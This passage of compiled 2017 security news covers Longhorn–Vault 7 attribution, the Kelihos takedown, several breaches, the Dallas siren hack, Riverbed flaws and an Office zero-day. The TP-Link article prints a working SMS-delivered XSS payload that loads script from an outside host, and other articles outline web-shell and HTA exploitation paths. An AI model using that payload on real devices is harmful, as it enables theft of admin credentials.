Researchers have observed Longhorn attacks aimed at more than 40 targets across 16 different countries in Europe, Asia (Middle East and other regions) and Africa. The list of targets includes governments, international organizations, and companies in the telecoms, financial, aerospace, energy, IT, education, and national resources sectors. Symantec pointed out that all of the targeted entities could present an interest to a nation-state actor.

An analysis of Longhorn’s tools and working hours suggests that the group is located in North America and its members are English speakers.

The CIA has neither confirmed nor denied that the Vault 7 files are authentic. The agency said its mission is to collect foreign intelligence from overseas entities, and pointed out that it is legally prohibited from spying on Americans.

Symantec noted that it did detect one Longhorn malware infection in the United States, but an uninstaller was launched within hours, which could indicate that the computer had been infected unintentionally.

In addition to Plexor, Longhorn has used several other pieces of malware in its operations, including Trojans dubbed Corentry, LH1 and LH2.

Corentry’s development timeline coincides with the dates mentioned in a changelog file published by WikiLeaks for a tool called Fluxwire. Experts also determined that the Plexor backdoor is very similar to a tool named in the Vault 7 documents “Fire and Forget.”

Researchers also found similarities between the cryptographic protocols described in the Vault 7 files and the ones used by Longhorn.

“Other Vault 7 documents outline tradecraft practices to be used, such as use of the Real-time Transport Protocol (RTP) as a means of command and control (C&C) communications, employing wipe-on-use as standard practice, in-memory string de-obfuscation, using a unique deployment-time key for string obfuscation, and the use of secure erase protocols involving renaming and overwriting. Symantec has observed Longhorn tools following all of these practices,” the security firm said in a blog post.

If confirmed, Longhorn would be the second cyber espionage group whose activities have been tied to the U.S. government. The first was the NSA-linked Equation Group, whose mistakes were analyzed by the individuals who developed the Vault 7 tools.


Symantec confirms that Longhorn group is tied to CIA operators detailed in Vault 7
11.4.2017 securityaffairs BigBrothers

Symantec reportedly linked the CIA hacking tools to several cyber attacks powered over the years by the Longhorn group.
Security experts who analyzed the alleged CIA hacking tools included in the Vault 7 dump have been used against at least 40 governments and private organizations across 16 countries.
Researchers at company firm Symantec reportedly linked the CIA hacking tools to a number of cyber attacks launched in recent years by a threat actor the company identified as the Longhorn group.

“Spying tools and operational protocols detailed in the recent Vault 7 leak have been used in cyberattacks against at least 40 targets in 16 different countries by a group Symantec calls Longhorn. Symantec has been protecting its customers from Longhorn’s tools for the past three years and has continued to track the group in order to learn more about its tools, tactics, and procedures.” reads the analysis published by Symantec.

“The tools used by Longhorn closely follow development timelines and technical specifications laid out in documents disclosed by WikiLeaks.”

Symantec believes Longhorn is a North American hacking group that has been active since at least 2011. The group is very sophisticated and used zero-day exploits and complex malware to conduct targeted attacks against governments and organizations in almost every industry, including financial, energy, telecommunications and education, aerospace.

The Longhorn group is a well-resourced hacking team that operated on a standard Monday to Friday working week in an American time zone. The nature of the targets and its Techniques, Tactics, and Procedures (TTPs) suggests the Longhorn group is a state-sponsored crew.

The targets were all in located in the Middle East, Europe, Asia, and Africa. On one case, the researchers observed the Longhorn group compromising a computer in the US, following infection, an uninstaller was quickly executed, which demonstrates that this victim was infected unintentionally.

“The Longhorn group shares some of the same cryptographic protocols specified in the Vault 7 documents, in addition to following leaked guidelines on tactics to avoid detection.” continues Symantec. “Given the close similarities between the tools and techniques, there can be little doubt that Longhorn’s activities and the Vault 7 documents are the work of the same group.” continues Symantec.

Digging the precious Vault 7 archive the experts discovered the Fluxwire cyber espionage malware. The documents related to this malware include a changelog of dates for when new features were added to the malicious code, the features, the timeline are coherent with the development cycle of the Corentry malware created by Longhorn APT.
“These dates align closely with the development of one Longhorn tool (Trojan.Corentry) tracked by Symantec. New features in Corentry consistently appeared in samples obtained by Symantec either on the same date listed in the Vault 7 document or several days later, leaving little doubt that Corentry is the malware described in the leaked document.” reads Symantec.

“Early versions of Corentry seen by Symantec contained a reference to the file path for the Fluxwire program database (PDB) file. The Vault 7 document lists removal of the full path for the PDB as one of the changes implemented in Version 3.5.0.”

Longhorn group

“Up until 2014, versions of Corentry were compiled using GCC [GNU Compiler Collection]. According to the Vault 7 document, Fluxwire switched to an MSVC compiler for version 3.3.0 on February 25, 2015. This was reflected in samples of Corentry, where a version compiled on February 25, 2015, had used MSVC as a compiler.”

A second document in the Vault 7 archive details Fire and Forget, a specification for user-mode injection of a payload by a tool called Archangel.

The specification of the malicious code and the interface used to load it matches the Longhorn tool called Backdoor.Plexor.

The experts discovered many other similarities, another leaked CIA document outlined cryptographic protocols that should be implemented in the malware development.
“A third document outlines cryptographic protocols that malware tools should follow. These include the use of inner cryptography within SSL to prevent man-in-the-middle (MITM) attacks, key exchange once per connection, and use of AES with a 32-bit key. These requirements align with the cryptographic practices observed by Symantec in all of the Longhorn tools.” continues Symantec.

another Vault 7 document recommends using of in-memory string de-obfuscation and Real-time Transport Protocol (RTP) for communicating with the command and control (C&C) servers.

All the above techniques and protocols were implemented in all the hacking tools of the Longhorn group.

Researchers from Symantec discovered a number of indicators that confirm Longhorn was from an English-speaking, North American country.

“The acronym MTWRFSU (Monday Tuesday Wednesday ThuRsday Friday Saturday SUnday) was used to configure which day of the week malware would communicate with the attackers. This acronym is common in academic calendars in North America.” reads Symantec.”Some of the code words found in the malware, such as SCOOBYSNACK, would be most familiar in North America. In addition to this, the compilation times of tools with reliable timestamps indicate a time zone in the Americas.”

Summarizing, there is no doubt Longhorn group has the same abilities and hacking tools of the CIA operators documented in the Vault 7 documents.


Symantec Connects 40 Cyber Attacks to CIA Hacking Tools Exposed by Wikileaks
11.4.2017 thehackernews BigBrothers
Security researchers have confirmed that the alleged CIA hacking tools recently exposed by WikiLeaks have been used against at least 40 governments and private organizations across 16 countries.
Since March, as part of its "Vault 7" series, Wikileaks has published over 8,761 documents and other confidential information that the whistleblower group claims came from the US Central Intelligence Agency (CIA).
Now, researchers at cybersecurity company Symantec reportedly managed to link those CIA hacking tools to numerous real cyber attacks in recent years that have been carried out against the government and private sectors across the world.
Those 40 cyber attacks were conducted by Longhorn — a North American hacking group that has been active since at least 2011 and has used backdoor trojans and zero-day attacks to target government, financial, energy, telecommunications, education, aerospace, and natural resources sectors.
Although the group's targets were all in the Middle East, Europe, Asia, and Africa, researchers said the group once infected a computer in the United States, but an uninstaller was launched within an hour, which indicates the "victim was infected unintentionally."
What's interesting is that Symantec linked some of CIA hacking tools and malware variants disclosed by Wikileaks in the Vault 7 files to Longhorn cyber espionage operations.
Fluxwire (Created by CIA) ≅ Corentry (Created by Longhorn)
Fluxwire, a cyber espionage malware allegedly created by the CIA and mentioned in the Vault 7 documents, contains a changelog of dates for when new features were added, which according to Symantec, closely resemble with the development cycle of "Corentry," a malware created by Longhorn hacking group.
"Early versions of Corentry seen by Symantec contained a reference to the file path for the Fluxwire program database (PDB) file," Symantec explains. "The Vault 7 document lists removal of the full path for the PDB as one of the changes implemented in Version 3.5.0."
"Up until 2014, versions of Corentry were compiled using GCC [GNU Compiler Collection]. According to the Vault 7 document, Fluxwire switched to an MSVC compiler for version 3.3.0 on February 25, 2015. This was reflected in samples of Corentry, where a version compiled on February 25, 2015, had used MSVC as a compiler."
Similar Malware Modules
Another Vault 7 document details 'Fire and Forget' specification of the payload and a malware module loader called Archangel, which Symantec claims, match almost perfectly with a Longhorn backdoor called Plexor.
"The specification of the payload and the interface used to load it was closely matched in another Longhorn tool called Backdoor.Plexor," says Symantec.
Use of Similar Cryptographic Protocol Practices
Another leaked CIA document outlined cryptographic protocols that should be used within malware tools, such as using AES encryption with a 32-bit key, inner cryptography within SSL to prevent man-in-the-middle attacks, and key exchanges once per connection.
One leaked CIA document also recommends using of in-memory string de-obfuscation and Real-time Transport Protocol (RTP) for communicating with the command and control (C&C) servers.
According to Symantec, these cryptographic protocol and communication practices were also used by Longhorn group in all of its hacking tools.
More About LongHorn Hacking Group
Longhorn has been described as a well-resourced hacking group that works on a standard Monday to Friday working week — likely a behavior of a state-sponsored group — and operates in an American time zone.
Longhorn's advanced malware tools are specially designed for cyber espionage with detailed system fingerprinting, discovery, and exfiltration capabilities. The group uses extremely stealthy capabilities in its malware to avoid detection.
Symantec analysis of the group's activities also shows that Longhorn is from an English speaking North American country with code words used by it referring, the band The Police with code words REDLIGHT and ROXANNE, and colloquial terms like "scoobysnack."
Overall, the functionality described in the CIA documents and its links to the group activities leave "little doubt that Longhorn's activities and the Vault 7 documents are the work of the same group."


US Takes Down Huge Botnet as Spain Arrests Notorious Russian Hacker

11.4.2017 securityweek BotNet
U.S. Authorities Take Down Kelihos Botnet as Alleged Creator is Arrested in Spain

US authorities moved Monday to take down a global computer botnet behind the massive theft of personal data and unwanted spam emails, as Spain arrested the notorious Russian hacker who operated it.

US authorities say the Russian, Piotr or Peter Levashov, had operated the Kelihos network of tens of thousands of infected computers, stealing personal data and renting the network out to others to send spam emails by the millions and extort ransom from computer owners.

Levashov, also known in the hacking world as Peter Severa, was arrested at Barcelona airport on Friday at the US request.

A Spanish judge on Monday ordered him to be remanded in custody as Washington is expected to seek his extradition.

Spanish police said in a statement late Monday that the arrest was the result of a "complex inquiry carried out in collaboration with the American FBI."

A US indictment unsealed Monday said Levashov, 36 and a native of St. Petersburg, had operated the Kelihos botnet since around 2010.

It was not the first time US officials have gone after him. In 2008 he was indicted as a Russia-based partner of the leading US spammer, Alan Ralsky. Ralsky and others were jailed in that case but Levashov was never caught.

100,000 computers infected

The Kelihos network is made up of private computers around the world running on the Microsoft Window operating system. The computers are infected with malware that gives Levashov the ability to control them remotely, with the owners completely unaware.

According to the Justice Department, at times the number of computers in the network has topped 100,000, with between five and 10 percent of them in the United States.

Through underground networks, Kelihos sold the network's services to others, who would use it to send out spam emails advertising counterfeit drugs, work-at-home scams, and other fraud schemes, the indictment said.

They were also used for illegal "pump-and-dump" stock market manipulation schemes, and to spread other malware through which hackers could steal a user's banking account information including passwords, and lock up a computer's information to demand huge ransoms.

The indictment called Levashov "one of the world's most notorious criminal spammers."

The Spamhaus Project, which documents spam, botnets, malware and other abuse, listed him as seventh on its "10 Worst Spammers" list and "one of the longest operating criminal spam-lords on the internet."

"The ability of botnets like Kelihos to be weaponized quickly for vast and varied types of harms is a dangerous and deep threat to all Americans, driving at the core of how we communicate, network, earn a living, and live our everyday lives," said Acting US Assistant Attorney General Kenneth Blanco in a statement.

Using legal 'malware' against botnet

Levashov's arrest was unrelated to investigations into Russian interference in last year's US presidential election, US officials said.

Earlier, the suspect's wife had earlier told Russia Today that his arrest was connected to the election hacking case.

A Spanish court specializing in international cases will rule on whether he will be sent to the US.

The US has 40 days to present evidence backing Levashov's extradition, which the suspect opposes.

In parallel with the arrest, US justice authorities announced an extraordinary move to bring down the Kelihos network, obtaining warrants that allows it to install its own malware-like programs on computers in the network to intercept its operation.

Such a move appeared to be the first ever application of controversial new investigative powers which took effect late last year.

The Justice Department explained that its programs would be able to redirect Kelihos-infected computers into substitute servers in order to halt the network's operation.

In doing so, it can record the private IP or internet protocol addresses of the computers and provide them to internet service providers to help customers eliminate the infections, the department explained.

In a warrant that permitted investigators to "infect" botnet computers in order to block Kelihos, investigators pledged to guard the privacy of computer owners.

"This operation will not capture content from the target computers or modify them in any other capacity except limiting the target computers' ability to interact with the Kelihos botnet," the warrant said.


Hackers Steal Customer Card Data From GameStop

11.4.2017 securityweek Crime 
Video gaming retail company GameStop appears to have been breached, with an unknown number of customers' payment card details stolen.

Those details are thought to include customer card number, expiration date, name, address and card verification value (CVV2), usually a 3-digit security code printed on the back of the card.

The breach is thought to affect only online customers at the website Gamespot.com, without affecting any of Gamestop's high street stores.

The breach was first reported by KrebsOnSecurity, Friday. Krebs blogged about the incident and also contacted GameStop, who immediately acknowledged the breach.

Two sources in the finance industry told Krebs they had received reports from a credit card processor indicating that GameStop had probably been compromised between September 2016 and February 2017. The credit card processor will undoubtedly have informed Gamestop; but the brevity of the 'security update' on the GameStop website suggests it has only recently become aware of the breach.

"GameStop recently received notification from a third party," says the statement, "that it believed payment card data from cards used on the GameStop.com website was being offered for sale on a website. That day a leading security firm was engaged to investigate these claims. GameStop has and will continue to work non-stop to address this report and take appropriate measures to eradicate any issue that may be identified."

Noticeably for a company that has lost customer data, there is no offer of free credit monitoring for those affected -- just the statement, "GameStop would like to remind its customers that it is always advisable to monitor payment card account statements for unauthorized charges." Hopefully, that simply means that Gamestop doesn't yet know which or how many of its customers were compromised.

What isn't yet clear is the extent of the breach. It is assumed that malware intercepted the card details before they were encrypted onsite. This assumption is based on the belief that the CVV2 code was also stolen. Since companies are not supposed to store this code, it is assumed the malware stole the details before it was discarded.

However, the reality is that hackers seem to have been in the system for at least five months, unnoticed. It is perfectly feasible that they were able to steal more than just the card details. Christopher Boyd, a malware intelligence analyst at Malwarebytes, told SecurityWeek, "Even without considering the ramifications of swiped payment information, any compromise of a company selling video games to the public could prove to be a huge boon for a scammer. If they could obtain lists of titles purchased, for example, they could try phishing for specific games that require a login. Beyond that, they could identify certain titles as running on a gaming platform -- again, with its own login credentials.

"From there, they could sell those accounts on at a profit, or use them to phish further gamers. In this case, the information currently available suggests scammers may 'only' have payment information, but the danger is there to cause untold problems for people if just a little more (seemingly harmless) data were to be included."

At the very least the incident demonstrates just how hard it is for defenders to detect an attacker once inside the system. Once again it seems that the breach was only uncovered by a third-party when the attackers started to monetize the theft.


Hacker Caused Panic in Dallas by Turning ON Every Emergency Siren at Once
10.4.2017 thehackernews Hacking  
We have seen hackers flooding 911 emergency service with rogue requests to knock the service offline for an entire state, but some hacking incidents are worse than others.
One such incident took place in Dallas on Friday night when hacker triggered a network of 156 emergency warning sirens for about two hours, waking up residents and sparking fears of a disaster.
The emergency warning sirens — designed to warn citizens of the Texas about dangerous weather conditions, such as severe storms and tornados — were activated around 11:40 p.m. Friday and lasted until 1:20 a.m. Saturday.
The city officials tried to inform residents not to call 911 as there was not any emergency situation in the city, but the 911 system was nevertheless flooded with over 4,400 calls from panicked residents.
Rocky Vaz, director of Dallas Office of Emergency Management (OEM), told the Dallas Morning News that the alarms blasted about 15 times for 90-second durations. You can even watch video footage of the incident posted by some people on the social media.

The OEM technicians were eventually able to shut down the warning system and are working to keep this from happening again by implementing "more safeguards."
The city officials said the sirens were set off by a hacker who compromised the Dallas city's emergency alert system, but they did not disclose how the system was compromised or who may be responsible for the attack.
"We can state at this time that the City’s siren system was hacked Friday night," the Dallas Public Information Office confirmed on Saturday. "For security reasons, we cannot discuss the details of how this was done, but we do believe that the hack came from the Dallas area."
The officials have notified the Federal Communications Commission (FCC) for assistance in identifying the exact source of the hack.
This is the second time when some hacker has attacked critical infrastructure in the city. Last year, some unknown hacker hacked into some traffic signals in Dallas and used them to publish jokes.
Dallas Mayor Mike Rawlings noted on his Facebook page that the incident is yet "another serious example of the need for us to upgrade and better safeguard our city’s technology infrastructure," adding that they’re working on identifying and prosecuting those responsible for the attack.


British Payday Loan Firm Wonga Suffers Data Breach

10.4.2017 securityweek CyberCrime  
British payday loan company Wonga has informed customers that their personal and financial data may have been stolen in a cyberattack.

According to Wonga, hackers gained unauthorized access to names, email addresses, physical addresses, phone numbers, partial payment card numbers (i.e. the last four digits), bank account numbers, and sort codes. The firm’s investigation is ongoing.

Wonga says there is no evidence that passwords have been compromised, but users who are concerned can change their passwords as a precaution. Impacted individuals are being notified.

The Guardian reported that the incident may have affected as many as 270,000 current and former customers in the United Kingdom and Poland. Roughly 245,000 of the potential victims are from the U.K.

While complete payment card data is not at risk, Wonga says it will alert financial institutions, and it has advised customers to contact their bank and ask them to be on the lookout for any suspicious activity.

The company has also warned affected customers of scams and other online activities that may leverage this incident in an effort to trick users into handing over sensitive information.

This is one of the biggest known data breaches suffered by a U.K. company. In recent months, breaches have also been reported by Camelot, which runs the U.K. National Lottery, business software firm Sage, and telecoms company Three.

The country’s Information Commissioner's Office (ICO) has launched an investigation into the incident, and it could lead to a significant fine. Telecoms firm TalkTalk received a record fine of £400,000 (roughly half a million dollars) for the October 2015 breach that affected more than 150,000 customers. The ICO can issue a maximum fine of £500,000 ($620,000).


Hack Sets Off City Emergency Alarms in Dallas

10.4.2017 securityweek Cyber 
The City of Dallas, Texas, emergency alarm system was compromised by a hacker or hackers late Friday night. All 156 outside sirens, usually used for severe weather warnings, were activated more than a dozen times between approximately 11:45 pm Friday and 1:20 am Saturday until engineers manually disabled the system.

The Dallas Outdoor Warning Sirens are designed to alert people outside to go indoors for shelter and information. The sirens are not meant to be heard indoors. Their primary function is to warn of imminent severe weather; but with no immediate sign of this, some people worried about reprisals for recent US military action in Syria.

The 911 emergency service, already under pressure through staff shortage, received approximately double its usual number of calls; and waiting time at its worst increased from the usual 10 seconds to around six minutes.

No details of the hack have yet been released, although it is believed the attacker is from the Dallas area. "For security reasons," said spokeswoman Sana Syed, "we cannot discuss the details of how this was done, but we do believe that the hack came from the Dallas area. We have notified the FCC for assistance in identifying the source of this hack. We are putting in safeguards to ensure this type of hack does not happen again."

Attacks against emergency alert systems are rare, but not unknown. In 2013, hackers breached an emergency alert system (EAS), causing TV stations in Michigan, California, Montana and New Mexico to broadcast a zombie warning, "the bodies of the dead are rising from their graves and attacking the living."

Dallas engineers are thought to have located the source of their own breach, and have ruled out both their control system and remote access. If the attacker breached the communications channels this could explain the belief that he or they are local to the area.

At the time of writing, the police had not been notified.

Dallas Mayor Mike Rawlings commented on Facebook, "This is yet another serious example of the need for us to upgrade and better safeguard our city's technology infrastructure. It's a costly proposition, which is why every dollar of taxpayer money must be spent with critical needs such as this in mind."

In November 2016, the City Council approved a $567,368 budget to maintain and repair the emergency sirens over the next six years. Michigan-based West Shore Services, a distributor of Federal Signal outdoor warning products, won the contract.

When approached over the weekend, West Shore's director of operations, Luke Miller, had not been informed of the breach by the Dallas Office of Emergency Management. "I am trying to get information along with everyone else," he said. "I don't know anything."

Martin Zinaich, chief security officer for the city of Tampa, Florida, told SecurityWeek, "We keep putting more and more 'things' (including critical infrastructure) on a public network that everyone in the world, both good and bad, have access to -- yet we still do not have information security being considered as part of a complete business risk profile."

Zinaich believes it is symptomatic of an ever-worsening cyber security condition that will require drastic action to solve. In a paper comparing cyber security to the long, slow descent and ultimate destruction of Eastern Air Lines Flight 401, he says, "In short, what we have put in place are insecure computing devices connected together using insecure protocols over a fabric connected to support some of our most critical dependencies and let anyone in the world -- good or bad -- have access to it."

His own solution would be for American CISOs to come together in a professional association, similar to the AMA, so that together they could influence the quality of security much as the AMA has influenced and improved the quality of medicine.


Serious Vulnerabilities Found in Riverbed SteelCentral Portal

10.4.2017 securityweek Vulnerebility 
Researchers at vulnerability management services provider Digital Defense have identified four security holes in Riverbed SteelCentral, a popular application and network performance monitoring product.

The flaws affect the SteelCentral Portal application and they can be exploited by unauthenticated attackers for remote command execution and to obtain user information. The vulnerabilities were reported to Riverbed Technology in January and they were later patched by the vendor.

According to Digital Defense, there are two remote command execution vulnerabilities that can be exploited to take full control of the host running the SteelCentral Portal application, and from there hijack all connected data sources using administrator credentials.

One of the flaws, related to the UploadImageServlet function, can be exploited to upload arbitrary files to a directory that is remotely accessible. An attacker can upload a JavaServer Page (JSP) shell that allows execution of arbitrary commands with SYSTEM privileges.

The second RCE weakness is related to the H2 web console, a service that can be accessed remotely without authentication. In its advisory, Digital Defense said the H2 console is designed for access during development, but it’s still present in the default installation of the SteelCentral Portal.

Researchers determined that the console can be used to access the Portal’s PostgreSQL database – this database normally doesn’t allow remote connections, but the H2 console bypasses the restriction by connecting from localhost.

“Once connected to the PostgreSQL database, an attacker can create a new table; insert the file content for a JSP shell into the table, then export the table contents to a file in the root directory of the web application. An attacker can then gain access to a web shell without authentication, and run arbitrary commands with SYSTEM privileges,” Digital Defense said in its advisory.

Experts have also identified two information disclosure flaws that can be exploited by unauthenticated attackers to enumerate usernames. Once the usernames are obtained, a hacker can launch a brute-force attack against the SteelCentral Portal interface.

Researchers managed to exploit the vulnerabilities in versions 1.3.1 and 1.4.0. Riverbed customers can obtain information on the patches through the company’s support portal.


Another Russian Hacker Arrested In Spain Reportedly Over U.S. Election Hacking
10.4.2017 thehackernews CyberCrime  
A Russian computer hacker and alleged spam kingpin was arrested in Barcelona, Spain, on Friday reportedly over suspicion of being involved in hacking attacks linked to alleged interference in last year's United States presidential election process.
36-year-old Pyotr Levashov from St. Petersburg was detained by police in Barcelona after US authorities issued an international arrest warrant for his arrest.
While the Russian embassy in Madrid announced Levashov's arrest on Sunday, it did not confirm the reason for his arrest.
This is the second arrest made by the Spanish authorities since the US 2016 election. In January, the police detained Stanislav Lisov, 32, on suspicion of creating and operating the NeverQuest Banking Trojan and possibly influencing the presidential election in Donald Trump's favor.
US authorities are planning to request the extradition of both hackers to the United State, where they are facing charges for their hacking-related crimes.
During an interview with Russian press agency RT, Levashov's wife Maria said that her husband was held "at the request of the American authorities in connection with cyber crime."
Maria spoke with Spanish officials, who mentioned "something about a virus that was supposedly created by [her] husband" and was related to Trump's victory in last year's presidential race.
Western security researchers have identified Levashov as Peter Severa (aka Peter Levashov) – the man who has also been listed in the world's Top 10 Worst Spammers maintained by anti-spam group Spamhaus, which has given him the 7th position in the list.
Peter Carr, a spokesperson for the Criminal Division of the US Department of Justice, told the news agency that "the US case remains under seal, so [they] have no information to provide at this time."
The US government has repeatedly accused Russia of hacking Democratic party and leaking personal data in order to influence election results in favor of Donald Trump, though Russian officials have repeatedly denied the accusations.
Congressional committees and the Federal Bureau of Investigation are examining links between Russia and Trump.


Critical Office Zero-Day Exploited in Attacks

10.4.2017 securityweek Vulnerebility 
An unpatched critical vulnerability in Microsoft Office is being exploited by malicious actors to achieve full code execution on target machines, McAfee and FireEye security researchers warn.

The vulnerability resides in the Object Linking and Embedding (OLE) functionality in Office and can be abused to create malicious RTF (Rich Text Format) documents that link to HTA (HTML Application) files hosted on remote servers. These HTA files load and execute a final malicious Visual Basic script.

“Because .hta is executable, the attacker gains full code execution on the victim’s machine,” McAfee explains, adding that the malicious RTF samples they observed were using the .doc extension.

Both McAfee and FireEye explain that this logical bug allows attackers to bypass memory-based mitigations developed by Microsoft, as well as other security products. The malicious documents are used to download and execute malicious payloads pertaining to various well-known malware families.

The HTA files used in the observed attacks were masquerading as normal RTF files to trick users and evade detection. When successful, the exploit closes the original Office document, then opens a new one and displays it to the victim, while the malicious code is being installed in the background.

“In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link,” FireEye explains.

The vulnerability was initially observed in January, but attacks that leverage it continue to surface, McAfee says. The security company said that all Office versions are affected by this issue, including Office 2016 on Windows 10.

According to FireEye, they too have been aware of the vulnerability for some time, but they have been coordinating with Microsoft for several weeks to release information on the matter only after a patch was available. Microsoft’s next set of security patches is scheduled to roll-out as soon as this Tuesday.

Users are advised to avoid opening Office files that come from unknown sources and to leave Office Protected View enabled to ensure no malicious code runs without their knowledge. Apparently, the vulnerability can’t bypass Protected View.


Alleged Kelihos Botnet Author Arrested in Spain

10.4.2017 securityweek BotNet
A Russian national arrested by the Spanish police last week is believed to be the programmer behind the infamous Kelihos spam botnet.

The man, Pyotr Levashov, was arrested in Barcelona, Spain, while on vacation, supposedly on an arrest warrant issued by United States authorities. The arrest has been already confirmed by the Russian embassy in Madrid, but no official details on why he was detained have been provided.

While mainstream media initially reported that the arrest might be tied to an interference in last year's U.S. election, it appears that Levashov was actually arrested for his involvement in the development and running of a large spam botnet.

In December 2016, the U.S. officially attributed election hacks to Russian threat groups, and also announced a series of sanctions against Russian nationals, also related to the election hacks. The attribution report, however, failed to achieve its purpose, security experts argued.

According to Reuters, Russian television station RT claimed a connection between Levashov’s arrest and the cybercriminal interference with the U.S. election, but a U.S. Department of Justice official has already confirmed that the arrest doesn’t have “an apparent national security connection.”

A NYTimes article also notes that Levashov doesn’t have an apparent connection to the election hacks, but that he is one of the most wanted spammers worldwide. Also known as Peter Severa, he is believed to be responsible for a long-running computer spam business.

Pyotr Levashov, who also uses the aliases Peter Severa and Peter of the North, is supposedly connected to the Waledac and Kelihos spam botnets, Brian Krebs reports. As he points out, Levashov is present on Spamhaus’ global Top 10 Worst Spammers.

Capable of sending around 1.5 billion spam messages a day, Waledac was taken down in 2010, but Kelihos emerged the same year, featuring many code similarities with the previous threat. However, the new malware variant wasn’t considered as part of the Waledac family, as it was a new and separate spam botnet.

Kelihos is currently one of the largest spam bots out there, and has been able to withstand several takedown attempts by security companies. Last year, the botnet was observed tripling its size overnight, and is currently placed first in Check Point’s Top 10 malware threats. Earlier this year, it also displayed worm-like distribution capabilities.

According to Krebs, while there is ample evidence tying Levashov to Waledac/Kelihos, the man is also believed to be connected to a series of criminal operations where malware authors and spammers were paid to install “fake antivirus” software that would display an overwhelming amount of alerts to victims, in an attempt to force them into buying bogus software.

Levashov is said to have made more money renting the spam botnets to other cybercriminals than running the email-blasting operations on his own. Reportedly, he would demand $300 per million messages promoting auction and employment scams, and $500 per million phishing emails. Recently, the Kelihos botnet was observed distributing ransomware.


Alleged Russian hacker arrested in Spain reportedly over US Presidential Election Hack
10.4.2017 securityaffairs CyberCrime

Spanish law enforcement arrested in Barcellona the Russian hacker Pyotr Levashov who is suspected of being involved in attacks on 2016 US Election.
Spanish law enforcement arrested in Barcelona the Russian hacker and alleged spam kingpin Pyotr Levashov (36). The man is suspected of being involved in hacking attacks against entities linked to the 2016 US Presidential Election.

The Russian embassy in Madrid confirmed the arrest of the suspect by did not disclose the reason for the arrest.

“Russian television station RT reported that Levashov was arrested under a U.S. international arrest warrant and was suspected of being involved in hacking attacks linked to alleged interference in last year’s U.S. election.” reported the Reuters Agency.

“Peter Carr, a spokesman for the U.S. Justice Department’s criminal division, said: “The U.S. case remains under seal, so we have no information to provide at this time.”

A U.S. Department of Justice official told the Reuters that the man was suspected of cyber crime and not of state-sponsored hacking.

Pyotr Levashov was detained by the Spanish police in Barcelona after the US authorities issued an international arrest warrant for the arrest of the Russian hacker.

The arrest of Levashov is the second one made by the Spanish police related to hackers suspected of being involved in the attacks against the US 2016 election. In January, the police

Early this year, the Spanish police arrested the hacker Stanislav Lisov (32) on suspicion of creating and distributing the dreaded NeverQuest Banking Trojan. The authorities believe it was also involved in the attacks against the US Presidential Election.

Russian hacker

The Neverquest banking trojan, aka Vawtrak, is very popular in the criminal underground.It has been around for several years and was used to target of hundreds of financial institutions worldwide.

One of the last variants discovered in summer 2016 was spotted by experts from Fidelis firm. The new version of the Neverquest malware included significant improvements such as the SSL pinning and leverages on a DGA mechanism to generates .ru domains with a pseudorandom number generator (PRNG) discovered in the loader.

The US authorities are going to request the extradition of both hackers arrested in Spain to the United State.

Security experts linked Levashov to Peter Severa (aka Peter Levashov) one of the Top 10 Worst Spammers in the world.

The US government has repeatedly accused the Kremlin of hacking Democratic party in order to influence the final result of the election.


How to get admin credentials from TP-Link M5350 3G/Wi-Fi modem with a text message
10.4.2017 securityaffairs  Hacking

A German security researcher discovered how to retrieve the admin credentials from a TP-Link M5350 3G/Wi-Fi modem with an evil text message
Some bugs are very strange and dangerous, this is the case of a flaw affecting the TP-Link’s M5350 3G/Wi-Fi router that can expose admin credentials to an evil text message.

The bug was discovered by the security researcher Jan Hörsch from the German firm Securai, basically, it is a cross-site scripting (XSS) vulnerability that could be exploited by an attacker by simply sending an SMS containing the following attack script:

<script src=//n.ms/a.js></script>

“Among other things, he showed that the mobile router from TP-Link M5350 is permanently vulnerable to cross-site scripting, which is triggered by SMS. If an attacker sends an SMS with the appropriate content, the router answers with the login data of the admin – including the password in the plaintext.” reported the Heise.de.

Hörsch conducted an intensive research on various Internet-of-Things devices discovering multiple vulnerabilities. He analyzed the firmware running on several smart objects and discovered multiple bugs easy to exploit, the results of the research were presented at the recent Kaspersky Security Analyst Summit.

The flaw in the TP-Link’s M5350 3G/Wi-Fi modem appears like a feature created by developers, likely for testing purposes, unfortunately, it wasn’t removed in production.

The device’s admin credentials can be retrieved by an attacker with a simple text message, the router replies with admin username, admin password, its SSID, and its login password.

TP-Link M5350 3G/Wi-Fi modem

It is unlikely that the bug has been fixed by TP-Link, giving a look at the firmware download page for the TP-Link M5350 it is possible to verify that the most-recent version for the flawed device is M5350_V2_140115, released in January 2015.

Hörsch also analyzed a Panasonic BM ET200 retina scanner and a Startech modem, both devices affected by flaws.


Researchers warn of a Windows Zero-Day Attack observed in the wild
10.4.2017 securityaffairs Vulnerebility

Security researchers from firms McAfee and FireEye are warning of a Windows zero-day attack in the wild that put Microsoft users at risk of hack.
Security researchers from security firms McAfee and FireEye are warning of hackers exploiting an

Just opening an MS Word document could put you at risk, the exploitation of the flaw could allow an attacker to silently install a malware on a fully patched Windows machine.

The attack vectors are malicious emails that come with a weaponized Word document containing a booby-trapped OLE2link object.

“The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script.” reads the analysis shared by FireEye. “In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link. “The vulnerability is bypassing most mitigations”

When the user opens the document, the malicious code is executed, it first connects to a remote server to download a malicious HTML application file (HTA) that’s masquerading as a document created in Microsoft’s RTF (Rich Text Format).

Windows Zero-Day Attack

The HTA file is automatically executed automatically with attackers gaining full code execution on the target machine, downloading additional malicious payloads to fully compromise the machine.

The Windows zero-day attack leverage on .hta content that is disguised as a normal RTF file to evade security solutions, but researchers at McAfee spotted the malicious Visual Basic scripts in a later part of the file.

The exploit displays a decoy Word document for the victims to see before terminating to avoid suspicion.

“The successful exploit closes the bait Word document and pops up a fake one to show the victim. In the background, the malware has already been stealthily installed on the victim’s system.” reads a blog post published by McAfee.

“The root cause of the zero-day vulnerability is related to the Windows Object Linking and Embedding (OLE), an important feature of Office. (Check our Black Hat USA 2015 presentation, in which we examine the attack surface of this feature.)”

This Window zero-day attack is very insidious, it doesn’t require victims interaction, for example, it doesn’t need victims enabling Macros.

The Window zero-day attack works on all Windows OS version, even against Windows 10.

